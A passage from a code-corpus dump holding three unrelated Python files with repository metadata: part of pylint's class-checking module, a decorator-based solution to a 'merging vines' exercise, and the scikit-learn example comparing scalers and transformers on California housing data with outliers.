'getDescriptionFor', 'getDoc', 'getName', 'getTaggedValue',
'getTaggedValueTags', 'isEqualOrExtendedBy', 'setTaggedValue',
'isImplementedByInstancesOf',
# twisted
'adaptWith',
# logilab.common interface
'is_implemented_by'),
'type' : 'csv',
'metavar' : '<method names>',
'help' : 'List of interface methods to ignore, \
separated by a comma. This is used for instance to not check methods defines \
in Zope\'s Interface base class.'}
),
('defining-attr-methods',
{'default' : ('__init__', '__new__', 'setUp'),
'type' : 'csv',
'metavar' : '<method names>',
'help' : 'List of method names used to declare (i.e. assign) \
instance attributes.'}
),
('valid-classmethod-first-arg',
{'default' : ('cls',),
'type' : 'csv',
'metavar' : '<argument names>',
'help' : 'List of valid names for the first argument in \
a class method.'}
),
('valid-metaclass-classmethod-first-arg',
{'default' : ('mcs',),
'type' : 'csv',
'metavar' : '<argument names>',
'help' : 'List of valid names for the first argument in \
a metaclass class method.'}
),
('exclude-protected',
{
'default': (
# namedtuple public API.
'_asdict', '_fields', '_replace', '_source', '_make'),
'type': 'csv',
'metavar': '<protected access exclusions>',
'help': ('List of member names, which should be excluded '
'from the protected access warning.')}
))
def __init__(self, linter=None):
BaseChecker.__init__(self, linter)
self._accessed = []
self._first_attrs = []
self._meth_could_be_func = None
def visit_class(self, node):
"""init visit variable _accessed and check interfaces
"""
self._accessed.append(defaultdict(list))
self._check_bases_classes(node)
self._check_interfaces(node)
# if not an interface, exception, metaclass
if node.type == 'class':
try:
node.local_attr('__init__')
except astroid.NotFoundError:
self.add_message('no-init', args=node, node=node)
self._check_slots(node)
self._check_proper_bases(node)
@check_messages('inherit-non-class')
def _check_proper_bases(self, node):
"""
Detect that a class inherits something which is not
a class or a type.
"""
for base in node.bases:
ancestor = safe_infer(base)
if ancestor in (YES, None):
continue
if (isinstance(ancestor, astroid.Instance) and
ancestor.is_subtype_of('%s.type' % (BUILTINS,))):
continue
if not isinstance(ancestor, astroid.Class):
self.add_message('inherit-non-class',
args=base.as_string(), node=node)
@check_messages('access-member-before-definition',
'attribute-defined-outside-init')
def leave_class(self, cnode):
"""close a class node:
check that instance attributes are defined in __init__ and check
access to existent members
"""
# check access to existent members on non metaclass classes
accessed = self._accessed.pop()
if cnode.type != 'metaclass':
self._check_accessed_members(cnode, accessed)
# checks attributes are defined in an allowed method such as __init__
if not self.linter.is_message_enabled('attribute-defined-outside-init'):
return
defining_methods = self.config.defining_attr_methods
current_module = cnode.root()
for attr, nodes in six.iteritems(cnode.instance_attrs):
# skip nodes which are not in the current module and it may screw up
# the output, while it's not worth it
nodes = [n for n in nodes if not
isinstance(n.statement(), (astroid.Delete, astroid.AugAssign))
and n.root() is current_module]
if not nodes:
continue # error detected by typechecking
# check if any method attr is defined in is a defining method
if any(node.frame().name in defining_methods
for node in nodes):
continue
# check attribute is defined in a parent's __init__
for parent in cnode.instance_attr_ancestors(attr):
attr_defined = False
# check if any parent method attr is defined in is a defining method
for node in parent.instance_attrs[attr]:
if node.frame().name in defining_methods:
attr_defined = True
if attr_defined:
# we're done :)
break
else:
# check attribute is defined as a class attribute
try:
cnode.local_attr(attr)
except astroid.NotFoundError:
for node in nodes:
if node.frame().name not in defining_methods:
# If the attribute was set by a callfunc in any
# of the defining methods, then don't emit
# the warning.
if _called_in_methods(node.frame(), cnode,
defining_methods):
continue
self.add_message('attribute-defined-outside-init',
args=attr, node=node)
def visit_function(self, node):
"""check method arguments, overriding"""
# ignore actual functions
if not node.is_method():
return
klass = node.parent.frame()
self._meth_could_be_func = True
# check first argument is self if this is actually a method
self._check_first_arg_for_type(node, klass.type == 'metaclass')
if node.name == '__init__':
self._check_init(node)
return
# check signature if the method overloads inherited method
for overridden in klass.local_attr_ancestors(node.name):
# get astroid for the searched method
try:
meth_node = overridden[node.name]
except KeyError:
# we have found the method but it's not in the local
# dictionary.
# This may happen with astroid build from living objects
continue
if not isinstance(meth_node, astroid.Function):
continue
self._check_signature(node, meth_node, 'overridden')
break
if node.decorators:
for decorator in node.decorators.nodes:
if isinstance(decorator, astroid.Getattr) and \
decorator.attrname in ('getter', 'setter', 'deleter'):
# attribute affectation will call this method, not hiding it
return
if isinstance(decorator, astroid.Name) and decorator.name == 'property':
# attribute affectation will either call a setter or raise
# an attribute error, anyway not hiding the function
return
# check if the method is hidden by an attribute
try:
overridden = klass.instance_attr(node.name)[0] # XXX
overridden_frame = overridden.frame()
if (isinstance(overridden_frame, astroid.Function)
and overridden_frame.type == 'method'):
overridden_frame = overridden_frame.parent.frame()
if (isinstance(overridden_frame, Class)
and klass.is_subtype_of(overridden_frame.qname())):
args = (overridden.root().name, overridden.fromlineno)
self.add_message('method-hidden', args=args, node=node)
except astroid.NotFoundError:
pass
# check non-iterators in __iter__
if node.name == '__iter__':
self._check_iter(node)
elif node.name == '__exit__':
self._check_exit(node)
def _check_slots(self, node):
if '__slots__' not in node.locals:
return
for slots in node.igetattr('__slots__'):
# check if __slots__ is a valid type
for meth in ITER_METHODS:
try:
slots.getattr(meth)
break
except astroid.NotFoundError:
continue
else:
self.add_message('invalid-slots', node=node)
continue
if isinstance(slots, astroid.Const):
# a string, ignore the following checks
continue
if not hasattr(slots, 'itered'):
# we can't obtain the values, maybe a .deque?
continue
if isinstance(slots, astroid.Dict):
values = [item[0] for item in slots.items]
else:
values = slots.itered()
if values is YES:
return
for elt in values:
try:
self._check_slots_elt(elt)
except astroid.InferenceError:
continue
def _check_slots_elt(self, elt):
for infered in elt.infer():
if infered is YES:
continue
if (not isinstance(infered, astroid.Const) or
not isinstance(infered.value, six.string_types)):
self.add_message('invalid-slots-object',
args=infered.as_string(),
node=elt)
continue
if not infered.value:
self.add_message('invalid-slots-object',
args=infered.as_string(),
node=elt)
def _check_iter(self, node):
try:
infered = node.infer_call_result(node)
except astroid.InferenceError:
return
for infered_node in infered:
if (infered_node is YES
or isinstance(infered_node, Generator)):
continue
if isinstance(infered_node, astroid.Instance):
try:
infered_node.local_attr(NEXT_METHOD)
except astroid.NotFoundError:
self.add_message('non-iterator-returned',
node=node)
break
def _check_exit(self, node):
positional = sum(1 for arg in node.args.args if arg.name != 'self')
if positional < 3 and not node.args.vararg:
self.add_message('bad-context-manager',
node=node)
elif positional > 3:
self.add_message('bad-context-manager',
node=node)
def leave_function(self, node):
"""on method node, check if this method couldn't be a function
ignore class, static and abstract methods, initializer,
methods overridden from a parent class and any
kind of method defined in an interface for this warning
"""
if node.is_method():
if node.args.args is not None:
self._first_attrs.pop()
if not self.linter.is_message_enabled('no-self-use'):
return
class_node = node.parent.frame()
if (self._meth_could_be_func and node.type == 'method'
and not node.name in PYMETHODS
and not (node.is_abstract() or
overrides_a_method(class_node, node.name))
and class_node.type != 'interface'):
self.add_message('no-self-use', node=node)
def visit_getattr(self, node):
"""check if the getattr is an access to a class member
if so, register it. Also check for access to protected
class member from outside its class (but ignore __special__
methods)
"""
attrname = node.attrname
# Check self
if self.is_first_attr(node):
self._accessed[-1][attrname].append(node)
return
if not self.linter.is_message_enabled('protected-access'):
return
self._check_protected_attribute_access(node)
def visit_assattr(self, node):
if isinstance(node.ass_type(), astroid.AugAssign) and self.is_first_attr(node):
self._accessed[-1][node.attrname].append(node)
self._check_in_slots(node)
def _check_in_slots(self, node):
""" Check that the given assattr node
is defined in the class slots.
"""
infered = safe_infer(node.expr)
if infered and isinstance(infered, Instance):
klass = infered._proxied
if '__slots__' not in klass.locals or not klass.newstyle:
return
slots = klass.slots()
if slots is None:
return
# If any ancestor doesn't use slots, the slots
# defined for this class are superfluous.
if any('__slots__' not in ancestor.locals and
ancestor.name != 'object'
for ancestor in klass.ancestors()):
return
if not any(slot.value == node.attrname for slot in slots):
# If we have a '__dict__' in slots, then
# assigning any name is valid.
if not any(slot.value == '__dict__' for slot in slots):
if _is_attribute_property(node.attrname, klass):
# Properties circumvent the slots mechanism,
# so we should not emit a warning for them.
return
self.add_message('assigning-non-slot',
args=(node.attrname, ), node=node)
@check_messages('protected-access')
def visit_assign(self, assign_node):
node = assign_node.targets[0]
if not isinstance(node, AssAttr):
return
if self.is_first_attr(node):
return
self._check_protected_attribute_access(node)
def _check_protected_attribute_access(self, node):
'''Given an attribute access node (set or get), check if attribute
access is legitimate. Call _check_first_attr with node before calling
this method. Valid cases are:
* self._attr in a method or cls._attr in a classmethod. Checked by
_check_first_attr.
* Klass._attr inside "Klass" class.
* Klass2._attr inside "Klass" class when Klass2 is a base class of
Klass.
'''
attrname = node.attrname
if (is_attr_protected(attrname) and
attrname not in self.config.exclude_protected):
klass = node_frame_class(node)
# XXX infer to be more safe and less dirty ??
# in classes, check we are not getting a parent method
# through the class object or through super
callee = node.expr.as_string()
# We are not in a class, no remaining valid case
if klass is None:
self.add_message('protected-access', node=node, args=attrname)
return
# If the expression begins with a call to super, that's ok.
if isinstance(node.expr, astroid.CallFunc) and \
isinstance(node.expr.func, astroid.Name) and \
node.expr.func.name == 'super':
return
# We are in a class, one remaining valid cases, Klass._attr inside
# Klass
if not (callee == klass.name or callee in klass.basenames):
# Detect property assignments in the body of the class.
# This is acceptable:
#
# class A:
# b = property(lambda: self._b)
stmt = node.parent.statement()
try:
if (isinstance(stmt, astroid.Assign) and
(stmt in klass.body or klass.parent_of(stmt)) and
isinstance(stmt.value, astroid.CallFunc) and
isinstance(stmt.value.func, astroid.Name) and
stmt.value.func.name == 'property' and
is_builtin_object(next(stmt.value.func.infer(), None))):
return
except astroid.InferenceError:
pass
self.add_message('protected-access', node=node, args=attrname)
def visit_name(self, node):
"""check if the name handle an access to a class member
if so, register it
"""
if self._first_attrs and (node.name == self._first_attrs[-1] or
not self._first_attrs[-1]):
self._meth_could_be_func = False
def _check_accessed_members(self, node, accessed):
"""check that accessed members are defined"""
# XXX refactor, probably much simpler now that E0201 is in type checker
for attr, nodes in six.iteritems(accessed):
# deactivate "except doesn't do anything", that's expected
# pylint: disable=W0704
try:
# is it a class attribute ?
node.local_attr(attr)
# yes, stop here
continue
except astroid.NotFoundError:
pass
# is it an instance attribute of a parent class ?
try:
next(node.instance_attr_ancestors(attr))
# yes, stop here
continue
except StopIteration:
pass
# is it an instance attribute ?
try:
defstmts = node.instance_attr(attr)
except astroid.NotFoundError:
pass
else:
# filter out augment assignment nodes
defstmts = [stmt for stmt in defstmts if stmt not in nodes]
if not defstmts:
# only augment assignment for this node, no-member should be
# triggered by the typecheck checker
continue
# filter defstmts to only pick the first one when there are
# several assignments in the same scope
scope = defstmts[0].scope()
defstmts = [stmt for i, stmt in enumerate(defstmts)
if i == 0 or stmt.scope() is not scope]
# if there are still more than one, don't attempt to be smarter
# than we can be
if len(defstmts) == 1:
defstmt = defstmts[0]
# check that if the node is accessed in the same method as
# it's defined, it's accessed after the initial assignment
frame = defstmt.frame()
lno = defstmt.fromlineno
for _node in nodes:
if _node.frame() is frame and _node.fromlineno < lno \
and not are_exclusive(_node.statement(), defstmt,
('AttributeError', 'Exception', 'BaseException')):
self.add_message('access-member-before-definition',
node=_node, args=(attr, lno))
def _check_first_arg_for_type(self, node, metaclass=0):
"""check the name of first argument, expect:
* 'self' for a regular method
* 'cls' for a class method or a metaclass regular method (actually
valid-classmethod-first-arg value)
* 'mcs' for a metaclass class method (actually
valid-metaclass-classmethod-first-arg)
* not one of the above for a static method
"""
# don't care about functions with unknown argument (builtins)
if node.args.args is None:
return
first_arg = node.args.args and node.argnames()[0]
self._first_attrs.append(first_arg)
first = self._first_attrs[-1]
# static method
if node.type == 'staticmethod':
if (first_arg == 'self' or
first_arg in self.config.valid_classmethod_first_arg or
first_arg in self.config.valid_metaclass_classmethod_first_arg):
self.add_message('bad-staticmethod-argument', args=first, node=node)
return
self._first_attrs[-1] = None
# class / regular method with no args
elif not node.args.args:
self.add_message('no-method-argument', node=node)
# metaclass
elif metaclass:
# metaclass __new__ or classmethod
if node.type == 'classmethod':
self._check_first_arg_config(
first,
self.config.valid_metaclass_classmethod_first_arg, node,
'bad-mcs-classmethod-argument', node.name)
# metaclass regular method
else:
self._check_first_arg_config(
first,
self.config.valid_classmethod_first_arg, node,
'bad-mcs-method-argument',
node.name)
# regular class
else:
# class method
if node.type == 'classmethod':
self._check_first_arg_config(
first,
self.config.valid_classmethod_first_arg, node,
'bad-classmethod-argument',
node.name)
# regular method without self as argument
elif first != 'self':
self.add_message('no-self-argument', node=node)
def _check_first_arg_config(self, first, config, node, message,
method_name):
if first not in config:
if len(config) == 1:
valid = repr(config[0])
else:
valid = ', '.join(repr(v) for v in config[:-1])
valid = '%s or %r' % (valid, config[-1])
self.add_message(message, args=(method_name, valid), node=node)
def _check_bases_classes(self, node):
"""check that the given class node implements abstract methods from
base classes
"""
def is_abstract(method):
return method.is_abstract(pass_is_abstract=False)
# check if this class abstract
if class_is_abstract(node):
return
methods = sorted(
unimplemented_abstract_methods(node, is_abstract).items(),
key=lambda item: item[0],
)
for name, method in methods:
owner = method.parent.frame()
if owner is node:
continue
# owner is not this class, it must be a parent class
# check that the ancestor's method is not abstract
if name in node.locals:
# it is redefined as an attribute or with a descriptor
continue
self.add_message('abstract-method', node=node,
args=(name, owner.name))
def _check_interfaces(self, node):
"""check that the given class node really implements declared
interfaces
"""
e0221_hack = [False]
def iface_handler(obj):
"""filter interface objects, it should be classes"""
if not isinstance(obj, astroid.Class):
e0221_hack[0] = True
self.add_message('interface-is-not-class', node=node,
args=(obj.as_string(),))
return False
return True
ignore_iface_methods = self.config.ignore_iface_methods
try:
for iface in node.interfaces(handler_func=iface_handler):
for imethod in iface.methods():
name = imethod.name
if name.startswith('_') or name in ignore_iface_methods:
# don't check method beginning with an underscore,
# usually belonging to the interface implementation
continue
# get class method astroid
try:
method = node_method(node, name)
except astroid.NotFoundError:
self.add_message('missing-interface-method',
args=(name, iface.name),
node=node)
continue
# ignore inherited methods
if method.parent.frame() is not node:
continue
# check signature
self._check_signature(method, imethod,
'%s interface' % iface.name)
except astroid.InferenceError:
if e0221_hack[0]:
return
implements = Instance(node).getattr('__implements__')[0]
assignment = implements.parent
assert isinstance(assignment, astroid.Assign)
# assignment.expr can be a Name or a Tuple or whatever.
# Use as_string() for the message
# FIXME: in case of multiple interfaces, find which one could not
# be resolved
self.add_message('unresolved-interface', node=implements,
args=(node.name, assignment.value.as_string()))
def _check_init(self, node):
"""check that the __init__ method call super or ancestors'__init__
method
"""
if (not self.linter.is_message_enabled('super-init-not-called') and
not self.linter.is_message_enabled('non-parent-init-called')):
return
klass_node = node.parent.frame()
to_call = _ancestors_to_call(klass_node)
not_called_yet = dict(to_call)
for stmt in node.nodes_of_class(astroid.CallFunc):
expr = stmt.func
if not isinstance(expr, astroid.Getattr) \
or expr.attrname != '__init__':
continue
# skip the test if using super
if isinstance(expr.expr, astroid.CallFunc) and \
isinstance(expr.expr.func, astroid.Name) and \
expr.expr.func.name == 'super':
return
try:
klass = next(expr.expr.infer())
if klass is YES:
continue
# The infered klass can be super(), which was
# assigned to a variable and the `__init__` was called later.
#
# base = super()
# base.__init__(...)
if (isinstance(klass, astroid.Instance) and
isinstance(klass._proxied, astroid.Class) and
is_builtin_object(klass._proxied) and
klass._proxied.name == 'super'):
return
try:
del not_called_yet[klass]
except KeyError:
if klass not in to_call:
self.add_message('non-parent-init-called',
node=expr, args=klass.name)
except astroid.InferenceError:
continue
for klass, method in six.iteritems(not_called_yet):
if klass.name == 'object' or method.parent.name == 'object':
continue
self.add_message('super-init-not-called', args=klass.name, node=node)
def _check_signature(self, method1, refmethod, class_type):
"""check that the signature of the two given methods match
class_type is in 'class', 'interface'
"""
if not (isinstance(method1, astroid.Function)
and isinstance(refmethod, astroid.Function)):
self.add_message('method-check-failed',
args=(method1, refmethod), node=method1)
return
# don't care about functions with unknown argument (builtins)
if method1.args.args is None or refmethod.args.args is None:
return
# if we use *args, **kwargs, skip the below checks
if method1.args.vararg or method1.args.kwarg:
return
if is_attr_private(method1.name):
return
if len(method1.args.args) != len(refmethod.args.args):
self.add_message('arguments-differ',
args=(class_type, method1.name),
node=method1)
elif len(method1.args.defaults) < len(refmethod.args.defaults):
self.add_message('signature-differs',
args=(class_type, method1.name),
node=method1)
def is_first_attr(self, node):
"""Check that attribute lookup name use first attribute variable name
(self for method, cls for classmethod and mcs for metaclass).
"""
return self._first_attrs and isinstance(node.expr, astroid.Name) and \
node.expr.name == self._first_attrs[-1]
def _ancestors_to_call(klass_node, method='__init__'):
"""return a dictionary where keys are the list of base classes providing
the queried method, and so that should/may be called from the method node
"""
to_call = {}
for base_node in klass_node.ancestors(recurs=False):
try:
to_call[base_node] = next(base_node.igetattr(method))
except astroid.InferenceError:
continue
return to_call
def node_method(node, method_name):
"""get astroid for <method_name> on the given class node, ensuring it
is a Function node
"""
for n in node.local_attr(method_name):
if isinstance(n, astroid.Function):
return n
raise astroid.NotFoundError(method_name)
def register(linter):
"""required method to auto register this checker """
linter.register_checker(ClassChecker(linter))
|
Shouqun/node-gn
|
tools/depot_tools/third_party/pylint/checkers/classes.py
|
Python
|
mit
| 42,518
|
[
"VisIt"
] |
5e925fe6b6efb45173c63f8025935b19004f7498771d12c0bbd11df58790ce65
|
'''
One summer Felicia was visiting her granny's summer house. There were several old and withered vines growing in the garden, that no longer produced grapes.
Felicia found it sad, and decided to decorate the vines with wooden grapes she carved out herself. She also watered them with cola, since cola makes everything better.
When winter came, Felicia left, but the vines were still there, better than ever before. Each year they grew higher and wider, and the pairs of neighboring vines
entangled together, forming a single vine. The wooden grapes were also doing just fine: they remained firmly attached to the vines.
Now that n years has passed, Felicia is going to visit her granny again, and she is curious about how the vines are doing. Given the number of grapes she hang on the vines,
return the number of grapes on each vine after n years, assuming that each year the (2 * i - 1)th and the (2 * i)th vines (1-based) merged into a single vine
(for each integer i in range [1, <number_of_vines> / 2]).
Example
For vines = [1, 2, 3, 4, 5] and n = 2, the output should be
mergingVines(vines, n) = [10, 5].
After the first year vines two pairs of vines entangled: vines 1 and 2 and vines 3 and 4 (1-based). The last vine didn't have anything to entangle with.
The vines could thus be represented as [3, 7, 5].
After the second year, another pair of vines entangled. The first and the second vines entangled, forming a single vine. It's possible to represent the vines as [10, 5],
which is the answer.
'''
# This one is very complicated and taught me some stuff about decorators that I'm still processing.
# (I'm sure there's more straightforward solutions, but this particular exercise taught me a lot about decorators specifically.)
# Basically, we use a decorator when we want to modify a function "from the outside". By that,
# I mean we don't actually want to change the code of the function itself, in case it's used elsewhere in the way originally intended.
# To do this modification, we write a new function that takes a function as input and outputs a slightly different function. We then use
# a !!!!!decorator!!!!! (yay!!) above the original function that tells Python that the function is slightly modified here.
# This problem goes a little step further and includes an argument that affects how the function will be modified. You'll see.
from functools import reduce
def mergingVines(vines, n):
# We will use this function to modify the sumOnce function further down.
# nTimes is itself a function object. When we use it as a decorator, an
# input of sumOnce (another function object) will be passed into it.
def nTimes(func):
# We want to return a function, so we define a wrapper function that modifies
# the behavior of func to what we want. Here, we want func to compose with itself n times.
def wrapper(*args,**kwargs):
# if the function has been applied 0 times, its effect is that of the identity function
if n == 0:
return (lambda x: x)(*args,**kwargs)
else:
return reduce(lambda f,g: lambda x: f(g(x)) , [ func for _ in range(n) ])(*args,**kwargs)
# we return this wrapper function object, so when nTimes decorates sumOnce,
# the sumOnce function will be passed as an argument to nTimes. Note that we could have
# just passed the vines variable into wrapper, but in general, decorators might decorate functions
# with different numbers or kinds of inputs, so we can use *args (lists of arguments) and
# **kwargs (keyword arguments) to be more general.
return wrapper
# Here's the decorator! We are modifying the sumOnce function
@nTimes
def sumOnce(vines):
res = [vines[i] + vines[i + 1] for i in range(0, len(vines) - 1, 2)]
if len(vines) % 2 == 1:
res.append(vines[-1])
return res
# The decorator has modified sumOnce, so now when we call it, it will actually be applied n times, as
# specified by the decorator function.
return sumOnce(vines)
print(mergingVines([1,2,3,4,5],2))
|
chuckinator0/Projects
|
scripts/vines.py
|
Python
|
gpl-3.0
| 3,983
|
[
"VisIt"
] |
83ddb29bb580c39b85110ba27b2d39e4ba0c00ff394d076125465f611335113b
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
=============================================================
Compare the effect of different scalers on data with outliers
=============================================================
Feature 0 (median income in a block) and feature 5 (number of households) of
the :ref:`california_housing_dataset` have very
different scales and contain some very large outliers. These two
characteristics lead to difficulties to visualize the data and, more
importantly, they can degrade the predictive performance of many machine
learning algorithms. Unscaled data can also slow down or even prevent the
convergence of many gradient-based estimators.
Indeed many estimators are designed with the assumption that each feature takes
values close to zero or more importantly that all features vary on comparable
scales. In particular, metric-based and gradient-based estimators often assume
approximately standardized data (centered features with unit variances). A
notable exception are decision tree-based estimators that are robust to
arbitrary scaling of the data.
This example uses different scalers, transformers, and normalizers to bring the
data within a pre-defined range.
Scalers are linear (or more precisely affine) transformers and differ from each
other in the way they estimate the parameters used to shift and scale each
feature.
:class:`~sklearn.preprocessing.QuantileTransformer` provides non-linear
transformations in which distances
between marginal outliers and inliers are shrunk.
:class:`~sklearn.preprocessing.PowerTransformer` provides
non-linear transformations in which data is mapped to a normal distribution to
stabilize variance and minimize skewness.
Unlike the previous transformations, normalization refers to a per sample
transformation instead of a per feature transformation.
The following code is a bit verbose, feel free to jump directly to the analysis
of the results_.
"""
# Author: Raghav RV <rvraghav93@gmail.com>
# Guillaume Lemaitre <g.lemaitre58@gmail.com>
# Thomas Unterthiner
# License: BSD 3 clause
import numpy as np
import matplotlib as mpl
from matplotlib import pyplot as plt
from matplotlib import cm
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import minmax_scale
from sklearn.preprocessing import MaxAbsScaler
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import QuantileTransformer
from sklearn.preprocessing import PowerTransformer
from sklearn.datasets import fetch_california_housing
print(__doc__)
dataset = fetch_california_housing()
X_full, y_full = dataset.data, dataset.target
# Take only 2 features to make visualization easier
# Feature of 0 has a long tail distribution.
# Feature 5 has a few but very large outliers.
X = X_full[:, [0, 5]]
distributions = [
('Unscaled data', X),
('Data after standard scaling',
StandardScaler().fit_transform(X)),
('Data after min-max scaling',
MinMaxScaler().fit_transform(X)),
('Data after max-abs scaling',
MaxAbsScaler().fit_transform(X)),
('Data after robust scaling',
RobustScaler(quantile_range=(25, 75)).fit_transform(X)),
('Data after power transformation (Yeo-Johnson)',
PowerTransformer(method='yeo-johnson').fit_transform(X)),
('Data after power transformation (Box-Cox)',
PowerTransformer(method='box-cox').fit_transform(X)),
('Data after quantile transformation (uniform pdf)',
QuantileTransformer(output_distribution='uniform')
.fit_transform(X)),
('Data after quantile transformation (gaussian pdf)',
QuantileTransformer(output_distribution='normal')
.fit_transform(X)),
('Data after sample-wise L2 normalizing',
Normalizer().fit_transform(X)),
]
# scale the output between 0 and 1 for the colorbar
y = minmax_scale(y_full)
# plasma does not exist in matplotlib < 1.5
cmap = getattr(cm, 'plasma_r', cm.hot_r)
def create_axes(title, figsize=(16, 6)):
fig = plt.figure(figsize=figsize)
fig.suptitle(title)
# define the axis for the first plot
left, width = 0.1, 0.22
bottom, height = 0.1, 0.7
bottom_h = height + 0.15
left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.1]
rect_histy = [left_h, bottom, 0.05, height]
ax_scatter = plt.axes(rect_scatter)
ax_histx = plt.axes(rect_histx)
ax_histy = plt.axes(rect_histy)
# define the axis for the zoomed-in plot
left = width + left + 0.2
left_h = left + width + 0.02
rect_scatter = [left, bottom, width, height]
rect_histx = [left, bottom_h, width, 0.1]
rect_histy = [left_h, bottom, 0.05, height]
ax_scatter_zoom = plt.axes(rect_scatter)
ax_histx_zoom = plt.axes(rect_histx)
ax_histy_zoom = plt.axes(rect_histy)
# define the axis for the colorbar
left, width = width + left + 0.13, 0.01
rect_colorbar = [left, bottom, width, height]
ax_colorbar = plt.axes(rect_colorbar)
return ((ax_scatter, ax_histy, ax_histx),
(ax_scatter_zoom, ax_histy_zoom, ax_histx_zoom),
ax_colorbar)
def plot_distribution(axes, X, y, hist_nbins=50, title="",
x0_label="", x1_label=""):
ax, hist_X1, hist_X0 = axes
ax.set_title(title)
ax.set_xlabel(x0_label)
ax.set_ylabel(x1_label)
# The scatter plot
colors = cmap(y)
ax.scatter(X[:, 0], X[:, 1], alpha=0.5, marker='o', s=5, lw=0, c=colors)
# Removing the top and the right spine for aesthetics
# make nice axis layout
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.spines['left'].set_position(('outward', 10))
ax.spines['bottom'].set_position(('outward', 10))
# Histogram for axis X1 (feature 5)
hist_X1.set_ylim(ax.get_ylim())
hist_X1.hist(X[:, 1], bins=hist_nbins, orientation='horizontal',
color='grey', ec='grey')
hist_X1.axis('off')
# Histogram for axis X0 (feature 0)
hist_X0.set_xlim(ax.get_xlim())
hist_X0.hist(X[:, 0], bins=hist_nbins, orientation='vertical',
color='grey', ec='grey')
hist_X0.axis('off')
# %%
# Two plots will be shown for each scaler/normalizer/transformer. The left
# figure will show a scatter plot of the full data set while the right figure
# will exclude the extreme values considering only 99 % of the data set,
# excluding marginal outliers. In addition, the marginal distributions for each
# feature will be shown on the sides of the scatter plot.
def make_plot(item_idx):
title, X = distributions[item_idx]
ax_zoom_out, ax_zoom_in, ax_colorbar = create_axes(title)
axarr = (ax_zoom_out, ax_zoom_in)
plot_distribution(axarr[0], X, y, hist_nbins=200,
x0_label="Median Income",
x1_label="Number of households",
title="Full data")
# zoom-in
zoom_in_percentile_range = (0, 99)
cutoffs_X0 = np.percentile(X[:, 0], zoom_in_percentile_range)
cutoffs_X1 = np.percentile(X[:, 1], zoom_in_percentile_range)
non_outliers_mask = (
np.all(X > [cutoffs_X0[0], cutoffs_X1[0]], axis=1) &
np.all(X < [cutoffs_X0[1], cutoffs_X1[1]], axis=1))
plot_distribution(axarr[1], X[non_outliers_mask], y[non_outliers_mask],
hist_nbins=50,
x0_label="Median Income",
x1_label="Number of households",
title="Zoom-in")
norm = mpl.colors.Normalize(y_full.min(), y_full.max())
mpl.colorbar.ColorbarBase(ax_colorbar, cmap=cmap,
norm=norm, orientation='vertical',
label='Color mapping for values of y')
# %%
# .. _results:
#
# Original data
# -------------
#
# Each transformation is plotted showing two transformed features, with the
# left plot showing the entire dataset, and the right zoomed-in to show the
# dataset without the marginal outliers. A large majority of the samples are
# compacted to a specific range, [0, 10] for the median income and [0, 6] for
# the number of households. Note that there are some marginal outliers (some
# blocks have more than 1200 households). Therefore, a specific pre-processing
# can be very beneficial depending of the application. In the following, we
# present some insights and behaviors of those pre-processing methods in the
# presence of marginal outliers.
make_plot(0)
# %%
# StandardScaler
# --------------
#
# :class:`~sklearn.preprocessing.StandardScaler` removes the mean and scales
# the data to unit variance. The scaling shrinks the range of the feature
# values as shown in the left figure below.
# However, the outliers have an influence when computing the empirical mean and
# standard deviation. Note in particular that because the outliers on each
# feature have different magnitudes, the spread of the transformed data on
# each feature is very different: most of the data lie in the [-2, 4] range for
# the transformed median income feature while the same data is squeezed in the
# smaller [-0.2, 0.2] range for the transformed number of households.
#
# :class:`~sklearn.preprocessing.StandardScaler` therefore cannot guarantee
# balanced feature scales in the
# presence of outliers.
make_plot(1)
# %%
# MinMaxScaler
# ------------
#
# :class:`~sklearn.preprocessing.MinMaxScaler` rescales the data set such that
# all feature values are in
# the range [0, 1] as shown in the right panel below. However, this scaling
# compresses all inliers into the narrow range [0, 0.005] for the transformed
# number of households.
#
# Both :class:`~sklearn.preprocessing.StandardScaler` and
# :class:`~sklearn.preprocessing.MinMaxScaler` are very sensitive to the
# presence of outliers.
make_plot(2)
# %%
# MaxAbsScaler
# ------------
#
# :class:`~sklearn.preprocessing.MaxAbsScaler` is similar to
# :class:`~sklearn.preprocessing.MinMaxScaler` except that the
# values are mapped in the range [0, 1]. On positive only data, both scalers
# behave similarly.
# :class:`~sklearn.preprocessing.MaxAbsScaler` therefore also suffers from
# the presence of large outliers.
make_plot(3)
# %%
# RobustScaler
# ------------
#
# Unlike the previous scalers, the centering and scaling statistics of
# :class:`~sklearn.preprocessing.RobustScaler`
# is based on percentiles and are therefore not influenced by a few
# number of very large marginal outliers. Consequently, the resulting range of
# the transformed feature values is larger than for the previous scalers and,
# more importantly, are approximately similar: for both features most of the
# transformed values lie in a [-2, 3] range as seen in the zoomed-in figure.
# Note that the outliers themselves are still present in the transformed data.
# If a separate outlier clipping is desirable, a non-linear transformation is
# required (see below).
make_plot(4)
# %%
# PowerTransformer
# ----------------
#
# :class:`~sklearn.preprocessing.PowerTransformer` applies a power
# transformation to each feature to make the data more Gaussian-like in order
# to stabilize variance and minimize skewness. Currently the Yeo-Johnson
# and Box-Cox transforms are supported and the optimal
# scaling factor is determined via maximum likelihood estimation in both
# methods. By default, :class:`~sklearn.preprocessing.PowerTransformer` applies
# zero-mean, unit variance normalization. Note that
# Box-Cox can only be applied to strictly positive data. Income and number of
# households happen to be strictly positive, but if negative values are present
# the Yeo-Johnson transformed is preferred.
make_plot(5)
make_plot(6)
# %%
# QuantileTransformer (uniform output)
# ------------------------------------
#
# :class:`~sklearn.preprocessing.QuantileTransformer` applies a non-linear
# transformation such that the
# probability density function of each feature will be mapped to a uniform
# or Gaussian distribution. In this case, all the data, including outliers,
# will be mapped to a uniform distribution with the range [0, 1], making
# outliers indistinguishable from inliers.
#
# :class:`~sklearn.preprocessing.RobustScaler` and
# :class:`~sklearn.preprocessing.QuantileTransformer` are robust to outliers in
# the sense that adding or removing outliers in the training set will yield
# approximately the same transformation. But contrary to
# :class:`~sklearn.preprocessing.RobustScaler`,
# :class:`~sklearn.preprocessing.QuantileTransformer` will also automatically
# collapse any outlier by setting them to the a priori defined range boundaries
# (0 and 1). This can result in saturation artifacts for extreme values.
